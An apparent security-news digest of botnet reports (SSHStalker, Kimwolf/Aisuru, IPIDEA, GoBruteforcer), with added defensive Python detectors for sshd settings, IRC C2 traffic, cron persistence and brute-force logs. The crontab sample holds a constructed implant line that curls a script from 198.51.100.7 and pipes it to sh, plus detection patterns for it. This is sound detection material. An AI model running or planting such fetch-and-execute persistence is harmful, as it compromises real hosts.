<ciso brief />

All news with #botnet tag

116 articles · page 3 of 6

SSHStalker botnet brute-forces thousands of Linux hosts

🔐 Researchers at Flare Systems uncovered a botnet, dubbed SSHStalker, that brute-forces weak SSH passwords and had compromised an estimated 7,000 Linux servers by the end of January, with roughly half located in the United States. The toolkit combines fileless malware, rootkits, log cleaners and a library of kernel exploits — some dating to 2009 — and can harvest AWS credentials. Flare characterizes it as a "scale-first" operation focused on persistence; observed capabilities include DDoS and cryptomining, though monetization has not yet been seen. Immediate mitigations include disabling SSH password authentication, switching to key-based or short-lived credentials, and restricting and rate-limiting SSH access.
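
The mitigations listed above only work if sshd actually enforces them, and sshd_config has a trap: sshd keeps the first value it reads for a keyword and ignores later duplicates, and anything under a `Match` line is conditional. The checker below is an added example written for this page (it is not Flare's code or anything from the article); it audits a config for the settings a password-guessing campaign relies on using first-value-wins semantics. The two sample configs are constructed, and the default values in `DEFAULTS` are assumed to be the documented OpenSSH 9.x defaults.

```python
import re

# sshd_config(5) defaults for the keywords a brute-force campaign depends on
# (assumed: current OpenSSH 9.x documented defaults).
DEFAULTS = {
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "maxauthtries": "6",
    "permitemptypasswords": "no",
}

# ChallengeResponseAuthentication is the legacy name of KbdInteractiveAuthentication.
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}


def parse_global(config_text):
    """Effective global value per keyword, the way sshd resolves it.

    sshd uses the FIRST value it reads for each keyword and ignores later
    duplicates. Directives after a `Match` line apply only to matching
    connections, so they are skipped rather than treated as global overrides.
    """
    effective = {}
    in_match = False
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = ALIASES.get(parts[0].lower(), parts[0].lower())
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        if key == "match":
            in_match = True                   # everything below is conditional
            continue
        if in_match:
            continue
        effective.setdefault(key, value)      # first value wins
    return effective


def audit(config_text):
    """Return findings for settings that keep password guessing viable."""
    eff = parse_global(config_text)

    def get(key):
        return eff.get(key, DEFAULTS[key])

    findings = []
    if get("passwordauthentication") != "no":
        findings.append("PasswordAuthentication is effectively 'yes': passwords can be guessed")
    if get("kbdinteractiveauthentication") != "no":
        findings.append("KbdInteractiveAuthentication is effectively 'yes': PAM can still prompt for a password")
    if get("permitrootlogin") == "yes":
        findings.append("PermitRootLogin yes: root is a direct password-guessing target")
    if get("permitemptypasswords") == "yes":
        findings.append("PermitEmptyPasswords yes")
    try:
        if int(get("maxauthtries")) > 3:
            findings.append(f"MaxAuthTries {get('maxauthtries')}: more guesses per connection than needed")
    except ValueError:
        findings.append("MaxAuthTries is not an integer")
    return findings


# Constructed sample: a permissive config. The second PasswordAuthentication
# line does nothing, because sshd already took the first value.
WEAK_CONFIG = """
Port 22
PasswordAuthentication yes
PermitRootLogin yes
MaxAuthTries 10
PasswordAuthentication no   # silently ignored by sshd
"""

# Constructed sample: the key-only state the mitigations above call for.
HARDENED_CONFIG = """
Port 22
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitRootLogin prohibit-password
MaxAuthTries 3
AuthenticationMethods publickey
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg) or ["ok"])
```

Rate limiting is not something sshd_config expresses; it belongs in the host firewall (an nftables or iptables connection-rate rule on port 22) or in a log-driven banning tool, and a `Match` block that re-enables passwords for one user is exactly the kind of conditional override the checker reports by omission, so review `Match` blocks by hand.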

Kimwolf Botnet Overwhelms I2P Anonymity Network Services

🛡️ The massive Kimwolf IoT botnet has been disrupting the I2P anonymity network after thousands of infected devices attempted to join as nodes, overwhelming relays and degrading connectivity. Users reported a rapid influx of new routers and widespread connection failures starting around Feb. 3, and developers linked the outages to a Sybil-style flood. Kimwolf operators later admitted they tried to register roughly 700,000 bots on I2P, and the network is currently running at reduced capacity while a stability update is rolled out.

SSHStalker Botnet Uses IRC C2 to Control Linux Systems

🛡️ Flare researchers describe SSHStalker, an IRC-controlled botnet that automates mass compromise of Linux systems by combining SSH scanning with a back-catalog of legacy kernel exploits. The operation drops C-based bots, Perl IRC bots that connect to UnrealIRCd, rootkit components, log-cleaning utilities and a keep-alive to maintain persistence. A Golang scanner enumerates SSH hosts and the toolkit includes automated erasure of SSH connection logs; unlike typical botnets, many infections remain dormant after access is obtained, suggesting staging or long-term retention.
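
IRC command-and-control is easy to spot once you stop keying on port 6667: the protocol grammar (a `NICK`/`USER` registration from the client, prefixed `NOTICE` or numeric replies and `PING` from the server) is the same whatever port the operator picks. The classifier below is an added example for this page, not Flare's tooling or anything from the SSHStalker write-up; it inspects the first bytes of each direction of a TCP session and flags IRC on a non-standard port as the higher-priority case. The four sessions are constructed.

```python
import re

# Ports an IRC server normally listens on. A bot speaking IRC anywhere else
# is a stronger signal than IRC traffic in general.
STANDARD_IRC_PORTS = set(range(6660, 6670)) | {6697, 7000}

NUMERIC_REPLY = re.compile(rb"^\d{3}$")   # server replies such as 001 (welcome)


def irc_lines(payload, limit=8):
    """Parse the first `limit` lines of a payload into (prefix, COMMAND, params).

    IRC lines are CRLF-terminated, optionally begin with ':prefix', and the
    next token is the command (RFC 1459 / RFC 2812).
    """
    parsed = []
    for line in payload.split(b"\n")[:limit]:
        tokens = line.rstrip(b"\r").split(b" ")
        prefix = None
        if tokens and tokens[0].startswith(b":"):
            prefix, tokens = tokens[0], tokens[1:]
        if not tokens or not tokens[0]:
            continue
        parsed.append((prefix, tokens[0].upper(), tokens[1:]))
    return parsed


def looks_like_irc(client_bytes, server_bytes):
    """True when the client registers (NICK and USER) and the server answers
    with IRC grammar: a prefixed NOTICE or numeric reply, or a PING."""
    client_cmds = {cmd for _, cmd, _ in irc_lines(client_bytes)}
    registered = {b"NICK", b"USER"} <= client_cmds
    server_ok = any(
        (prefix is not None and (cmd == b"NOTICE" or NUMERIC_REPLY.match(cmd)))
        or cmd == b"PING"
        for prefix, cmd, _ in irc_lines(server_bytes)
    )
    return registered and server_ok


def extract_channels(client_bytes):
    """Channels the client tries to JOIN; useful for pivoting across sessions."""
    chans = []
    for _, cmd, params in irc_lines(client_bytes, limit=64):
        if cmd == b"JOIN" and params:
            chans.extend(c.decode("ascii", "replace") for c in params[0].split(b",") if c)
    return chans


def classify_session(dst_port, client_bytes, server_bytes):
    if not looks_like_irc(client_bytes, server_bytes):
        return "not-irc"
    return "irc-standard-port" if dst_port in STANDARD_IRC_PORTS else "irc-nonstandard-port"


# Constructed sessions: (destination port, first client bytes, first server bytes).
SESSIONS = [
    # a bot registering with an IRC server that listens on 443 to blend in
    (443,
     b"NICK [x86_64]a1b2c3\r\nUSER bot 8 * :bot\r\nJOIN #ch :key\r\n",
     b":irc.example NOTICE * :*** Looking up your hostname...\r\nPING :12345\r\n"),
    # an ordinary TLS ClientHello / ServerHello on 443
    (443,
     b"\x16\x03\x01\x00\xf1\x01\x00\x00\xed\x03\x03" + b"\x00" * 10,
     b"\x16\x03\x03\x00\x5a\x02\x00\x00"),
    # a legitimate IRC client on the standard port
    (6667,
     b"CAP LS 302\r\nNICK alice\r\nUSER alice 0 * :Alice\r\n",
     b":irc.example 001 alice :Welcome\r\n"),
    # plain HTTP on 8080
    (8080,
     b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n",
     b"HTTP/1.1 200 OK\r\n\r\n"),
]

if __name__ == "__main__":
    for port, c, s in SESSIONS:
        print(port, classify_session(port, c, s), extract_channels(c))
```

The same check can be run from a passive sensor by feeding it the first few hundred bytes of each direction; requiring grammar in both directions keeps a stray `NICK` in an unrelated protocol from firing on its own.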

New Linux botnet SSHStalker uses IRC for C2 comms campaign

🛡️ A newly documented Linux botnet named SSHStalker uses the legacy IRC protocol for command-and-control while relying on noisy SSH scanning and brute forcing for initial access. Researchers at Flare say it deploys a Go binary masquerading as nmap, compiles C-based IRC bots on hosts, and persists via cron jobs that run every 60 seconds. The kit favors scale and reliability over stealth, reuses a back-catalog of decade-plus-old CVEs for privilege escalation, and includes AWS key harvesting, cryptomining, and dormant DDoS code.
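
The persistence described in the two SSHStalker items above (a cron job that fires every minute, a scanner binary borrowing the name `nmap`, and fileless components) leaves marks that are cheap to hunt for on a fleet. The script below is an added example for this page, not Flare's code or anything from the articles; it scores crontab entries and a process listing for those patterns. The crontab text and the `(pid, comm, exe)` tuples, which in practice come from `/proc/<pid>/comm` and `readlink /proc/<pid>/exe`, are constructed.

```python
import re

# Locations legitimate scheduled jobs and daemons rarely run from:
# world-writable temp directories and hidden directories ("/." matches /root/.x/ etc.).
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/.")

# Five schedule fields followed by the command (user crontab format).
CRON_LINE = re.compile(
    r"^(?P<min>\S+)\s+(?P<hour>\S+)\s+(?P<dom>\S+)\s+(?P<mon>\S+)\s+(?P<dow>\S+)\s+(?P<cmd>.+)$"
)
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def hunt_crontab(text):
    """Return [(line, reasons)] for crontab entries that look like a keep-alive.

    Signals: a schedule that fires every minute or at boot, a command that
    runs from a temp or hidden directory, and download-and-pipe-to-shell.
    """
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or an environment assignment such as PATH=
        if line.startswith("@"):              # @reboot, @hourly, ...
            schedule, _, cmd = line.partition(" ")
            every_minute, at_boot = False, schedule == "@reboot"
        else:
            m = CRON_LINE.match(line)
            if not m:
                continue
            cmd = m["cmd"]
            every_minute = m["min"] in ("*", "*/1") and all(
                m[f] == "*" for f in ("hour", "dom", "mon", "dow"))
            at_boot = False
        reasons = []
        if every_minute:
            reasons.append("fires every minute (keep-alive / re-spawn pattern)")
        if at_boot:
            reasons.append("fires at boot (persistence)")
        if any(d in cmd for d in SUSPICIOUS_DIRS):
            reasons.append("command runs from a temp or hidden directory")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("downloads and pipes straight into a shell")
        if reasons:
            hits.append((line, reasons))
    return hits


def hunt_processes(procs):
    """Return [(pid, reasons)] for processes whose executable has been deleted
    or lives only in memory (memfd), or that run from a temp or hidden path.

    procs: iterable of (pid, comm, exe); exe is the readlink target of
    /proc/<pid>/exe, which is empty for kernel threads.
    """
    hits = []
    for pid, comm, exe in procs:
        if not exe:
            continue
        reasons = []
        if exe.endswith("(deleted)") or exe.startswith("/memfd:"):
            reasons.append("backing file deleted or memory-only (fileless)")
        elif any(d in exe for d in SUSPICIOUS_DIRS):
            reasons.append(f"{comm!r} runs from a temp or hidden directory")
        if reasons:
            hits.append((pid, reasons))
    return hits


# Constructed sample crontab: two real maintenance jobs and three implants.
CRONTAB = """\
# user crontab
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * /dev/shm/.x/keep >/dev/null 2>&1
*/1 * * * * curl -s http://198.51.100.7/i.sh | sh
@reboot /tmp/.s/run
30 2 * * 0 /usr/local/bin/backup.sh
"""

# Constructed sample process list: (pid, comm, readlink of /proc/<pid>/exe).
PROCS = [
    (812, "sshd", "/usr/sbin/sshd"),
    (1490, "nmap", "/var/tmp/.cache/nmap"),   # scanner borrowing a tool name
    (1503, "kthreadd", ""),                   # kernel thread, no exe link
    (1611, "crond", "/usr/sbin/crond"),
    (2044, "bash", "/memfd:x (deleted)"),     # payload executed from memory
]

if __name__ == "__main__":
    for line, reasons in hunt_crontab(CRONTAB):
        print("cron:", line, reasons)
    for pid, reasons in hunt_processes(PROCS):
        print("proc:", pid, reasons)
```

System crontabs under `/etc/cron.d` carry an extra user field between the schedule and the command, so run them through the same regex after splitting that field off; and because the kit is reported to wipe SSH connection logs, a cron or process hit on a host whose `wtmp` is empty is a reason to escalate rather than to dismiss.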

Bloody Wolf Uses NetSupport RAT to Target Uzbekistan, Russia

🛡️ Kaspersky says the threat actor tracked as Stan Ghouls (also referred to as Bloody Wolf) has conducted spear‑phishing operations to deliver NetSupport RAT to systems in Uzbekistan and Russia. Malicious PDFs embed links that download a loader which displays fake errors, limits installation attempts, retrieves the RAT from multiple domains and ensures persistence through Startup items, a Registry autorun entry and a scheduled task. Kaspersky estimates roughly 50 victims in Uzbekistan and 10 in Russia, with additional infections in Kazakhstan, Turkey, Serbia and Belarus. The vendor also discovered Mirai botnet payloads staged on infrastructure associated with the actor, raising concerns about an expanded IoT targeting capability.

AISURU/Kimwolf Botnet Launches Record 31.4 Tbps DDoS

🚨 Cloudflare attributed a record hyper‑volumetric HTTP DDoS to the AISURU/Kimwolf botnet that peaked at 31.4 Tbps and lasted 35 seconds in November 2025. The group was also linked to a campaign codenamed The Night Before Christmas, which began on December 19, 2025, and produced averages near 3 billion packets per second (Bpps), 4 Tbps and 54 million requests per second (Mrps). Google and Cloudflare disrupted the IPIDEA residential proxy network used to recruit more than 2 million Android devices.

Global SystemBC Botnet Active on Over 10,000 Systems

🛡️ Silent Push links the long-running SystemBC malware to more than 10,000 infected IP addresses worldwide, including hosts tied to government sites. SystemBC acts as a multi-platform SOCKS5 proxy, turning compromised machines into relays that help attackers hide infrastructure and maintain persistence, often appearing before ransomware is deployed. Researchers found infections concentrated in data centres, uncovered a Perl-based Linux variant undetected by 62 antivirus engines, and observed reliance on abuse-tolerant hosting for C2 operations.

Weekly Cyber Recap: Proxy Botnet and Office Zero‑Day

🛡️ Google disrupted the IPIDEA residential proxy network by seizing or sinkholing command-and-control domains, cutting operators' ability to route traffic and shrinking by millions the pool of exit nodes that had been recruited via bundled SDKs or monetization lures. Microsoft released an out‑of‑band patch for an actively exploited Office zero‑day (CVE-2026-21509), while Ivanti fixed two EPMM RCEs. CERT Polska attributed destructive intrusions against Polish energy assets to Static Tundra, and criminals were observed hijacking exposed LLM endpoints for resale and lateral access. Researchers also documented new modular frameworks, open BYOB C2 repositories, and continued exploitation of web platforms and DevOps tooling.

Google Disrupts IPIDEA Residential Proxy Network at Scale

🔒 Google Threat Intelligence Group, working with industry partners, disrupted the IPIDEA residential proxy network by taking down domains, infected-device management systems, and proxy-traffic routing infrastructure. The operation targeted SDKs embedded in at least 600 trojanized Android apps and over 3,000 malicious Windows binaries, which collectively enrolled about 6.7 million devices worldwide. GTIG reported that more than 550 distinct threat groups abused IPIDEA for account takeovers, credential theft, botnet control, and DDoS support; users should avoid untrusted VPNs and apps that pay for bandwidth.

Google and Partners Disrupt Major Residential Proxy Network

🔍 Google and industry partners have disrupted IPIDEA, a large residential proxy network used to conceal malicious activity. The operation combined court action to seize domains with intelligence-sharing and platform enforcement, including expanded protections in Google Play Protect that remove apps embedding IPIDEA SDKs and block further installs. Google reports these steps have reduced the pool of proxy devices by millions and expects knock-on effects across reseller-linked services. The network’s SDKs were tied to multiple botnets and used by numerous threat actors to obscure follow-on attacks.

Aisuru Botnet Launches Record 31.4 Tbps DDoS Attack

🔴 Cloudflare says the Aisuru/Kimwolf botnet launched a record DDoS campaign on December 19 that peaked at 31.4 Tbps and about 200 million requests per second. The attacks, dubbed The Night Before Christmas, targeted telecommunications and IT providers and hit Cloudflare’s dashboard and infrastructure. Sources were identified as compromised Android TVs rather than typical IoT routers, and most bursts lasted one to two minutes. Cloudflare reports the attacks were detected and mitigated automatically without triggering internal alerts.

Disrupting IPIDEA: Takedown of Major Proxy Network

🏠 This week Google Threat Intelligence Group led coordinated legal, technical, and platform actions to disrupt the IPIDEA residential proxy network, a large global provider of exit-node infrastructure. Actions included domain takedowns, sharing SDK and infrastructure intelligence with platform providers and law enforcement, and enforcing Google Play Protect to remove and block offending apps. These steps materially degraded IPIDEA’s operations and reduced the pool of available exit-node devices by millions while enabling broader partner remediation.

Investigation Ties Badbox 2.0 Control to Chinese Firms

🔍 New analysis links the operators of the Badbox 2.0 Android TV botnet to named individuals and companies in China, following a screenshot allegedly obtained by the Kimwolf botmasters that shows authorized accounts. Open-source pivots on qq.com email addresses connect several accounts to developers and domains previously tied to Badbox activity. Google and the FBI are pursuing the operators while researchers warn that Kimwolf’s unauthorized access could let it push malware directly onto millions of infected streaming devices.

Kimwolf IoT Botnet Infects Corporate and Government Networks

🚨 A new IoT botnet, Kimwolf, has infected more than two million devices and is being used for large-scale DDoS and to relay abusive traffic. Operators abuse commercial residential proxy services—most prominently IPIDEA—to reach proxy endpoints and scan local networks, enabling lateral infections of vulnerable devices, particularly unofficial Android TV boxes. Some proxy providers have begun blocking Kimwolf-related traffic, but millions of infected endpoints remain within corporate and government networks.

RondoDox Botnet Escalates Exploitation of HPE OneView

⚠️ Check Point Research links the Linux-based RondoDox botnet to a coordinated exploitation campaign against HPE OneView, leveraging the critical RCE flaw CVE-2025-37164. The vulnerability, published to the NVD on 16 December 2025 and given a CVSS 3.1 base score of 10.0 by HPE, has been the subject of tens of thousands of automated attack attempts. Check Point reported blocking more than 40,000 hits on 7 January 2026 and urged organizations to patch immediately and implement compensating controls.

Kimwolf/AISURU Botnet Infects Over Two Million Devices

🚨 Black Lotus Labs said it null-routed traffic to more than 550 command-and-control nodes tied to the AISURU/Kimwolf botnet after detecting rapid growth beginning in early October 2025. Researchers attribute the expansion to a malicious ByteConnect SDK delivered to unsanctioned Android TV devices and proxy services that expose Android Debug Bridge (ADB). The botnet, leveraged for DDoS and residential proxy leasing, has infected more than two million devices and has been linked to hosting providers and proxy marketplaces where compromised nodes were offered for sale.

GoBruteforcer Botnet Targets Crypto Databases via Weak Keys

🔒 A new wave of GoBruteforcer attacks is targeting cryptocurrency and blockchain project databases by exploiting weak, reused credentials and exposed services such as FTP, MySQL, PostgreSQL, and phpMyAdmin on Linux hosts. Check Point Research reports the Golang-based botnet deploys obfuscated IRC bots and web shells, uses XAMPP's bundled FTP service as an initial vector, and relies on brute-force modules to expand, with compromised hosts then serving payloads and acting as backup C2.

China-linked UAT-7290 Targets Telcos via Edge Exploits

🛡️ Cisco Talos warns that a China-linked actor tracked as UAT-7290 has expanded its focus to telecommunications providers in Southeastern Europe. The group leverages Linux-based malware and one-day public exploits against edge network devices, plus targeted SSH brute force, to gain initial access and escalate privileges. UAT-7290 also establishes Operational Relay Boxes (ORBs) that are reused by other China-aligned actors. Talos published technical details and IOCs to help affected organizations respond.

Who Benefited From the Aisuru and Kimwolf Botnets: Findings

🔍 This analysis traces how the Aisuru and Kimwolf botnets turned millions of unsecured Android TV streaming boxes into residential proxies and DDoS participants. Investigators linked proxy traffic and control infrastructure to a Utah hosting firm, Resi Rack, a Discord marketplace (resi.to), and vendors including Plainproxies/ByteConnect and Maskify. Operators hardened control with the Ethereum Name Service to evade takedowns. Owners of affected TV boxes are urged to disconnect and replace them.

GoBruteforcer Botnet Bruteforces Exposed Linux Services

🔒 Check Point Research (CPR) reports that the GoBruteforcer botnet is actively targeting internet‑facing Linux servers, using large‑scale brute‑force attacks against services such as FTP, MySQL, PostgreSQL and phpMyAdmin. The latest Go‑based variant, observed since mid‑2025, introduces heavier obfuscation, stronger persistence and techniques to hide malicious processes. Compromised hosts become scanning and attack nodes, enabling data theft, backdoors, resale of access and further propagation. Analysts also recovered tools used to sweep TRON and Binance Smart Chain assets, underscoring a financial motive behind some campaigns.
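
Both GoBruteforcer items above, and the SSHStalker item earlier on this page, describe the same initial-access mechanic: one source hammering several exposed services (SSH, FTP, MySQL, PostgreSQL) with guessed credentials. Per-service thresholds miss a source that spreads a modest number of attempts across four daemons, so the detector below counts failures per source IP across all of them in one sliding window. It is an added example for this page, not Check Point's or Flare's code; the log lines are constructed, all are assumed to fall on the same day (only the HH:MM:SS is parsed), and the PostgreSQL lines assume a `log_line_prefix` that includes the client address (`%h`).

```python
import re
from collections import defaultdict, deque

TIME = re.compile(r"(\d{2}):(\d{2}):(\d{2})")

# One failed-login pattern per service. Named groups: ip (required), user (optional).
PATTERNS = [
    ("ssh",   re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port")),
    ("mysql", re.compile(r"Access denied for user '(?P<user>[^']*)'@'(?P<ip>[^']*)'")),
    ("pgsql", re.compile(r"\] (?P<ip>\S+) (?P<user>\S+)@\S+ FATAL:\s+password authentication failed")),
    ("ftp",   re.compile(r"FAIL LOGIN: Client \"(?P<ip>[^\"]+)\"")),
]


def parse(line):
    """Return (seconds_of_day, service, ip, user_or_None) for a failed login, else None."""
    t = TIME.search(line)
    if not t:
        return None
    secs = int(t[1]) * 3600 + int(t[2]) * 60 + int(t[3])
    for service, pat in PATTERNS:
        m = pat.search(line)
        if m:
            groups = m.groupdict()
            return (secs, service, groups["ip"], groups.get("user"))
    return None


def detect(lines, threshold=5, window=60):
    """Sliding-window brute-force detector across services.

    Alerts on any source IP with >= threshold failed logins within `window`
    seconds, regardless of which service each failure hit. Returns
    {ip: {"count", "services", "users", "first", "last"}}.
    """
    events = sorted(filter(None, map(parse, lines)), key=lambda e: e[0])
    recent = defaultdict(deque)      # ip -> deque of (t, service, user) inside the window
    alerts = {}
    for t, service, ip, user in events:
        q = recent[ip]
        q.append((t, service, user))
        while q and t - q[0][0] > window:
            q.popleft()              # drop attempts that aged out of the window
        if len(q) >= threshold:
            a = alerts.setdefault(ip, {"count": 0, "services": set(), "users": set(),
                                       "first": q[0][0], "last": t})
            a["count"] = max(a["count"], len(q))
            a["services"].update(s for _, s, _ in q)
            a["users"].update(u for _, _, u in q if u)
            a["last"] = t
    return alerts


# Constructed sample: one source spraying four services in seven seconds,
# a second source making two slow SSH attempts, and one successful key login.
SAMPLE_LOG = """\
Feb  4 10:01:02 web1 sshd[2123]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Feb  4 10:01:03 web1 sshd[2123]: Failed password for root from 203.0.113.5 port 51240 ssh2
2026-02-04T10:01:05.123456Z 44 [Warning] [Server] Access denied for user 'root'@'203.0.113.5' (using password: YES)
2026-02-04 10:01:07 UTC [3310] 203.0.113.5 postgres@postgres FATAL:  password authentication failed for user "postgres"
Wed Feb  4 10:01:09 2026 [pid 3400] [ftp] FAIL LOGIN: Client "203.0.113.5"
Feb  4 10:01:10 web1 sshd[2130]: Failed password for invalid user oracle from 198.51.100.20 port 40001 ssh2
Feb  4 10:02:40 web1 sshd[2131]: Failed password for invalid user oracle from 198.51.100.20 port 40002 ssh2
Feb  4 10:03:00 web1 sshd[2140]: Accepted publickey for deploy from 10.0.0.4 port 50022 ssh2
"""

if __name__ == "__main__":
    for ip, a in detect(SAMPLE_LOG.splitlines()).items():
        print(ip, a["count"], sorted(a["services"]), sorted(a["users"]))
```

Tune `threshold` and `window` per environment; the second source in the sample only trips the detector when the window is widened, which is the trade-off between catching slow, distributed guessing and paging on a user who mistyped a password a few times.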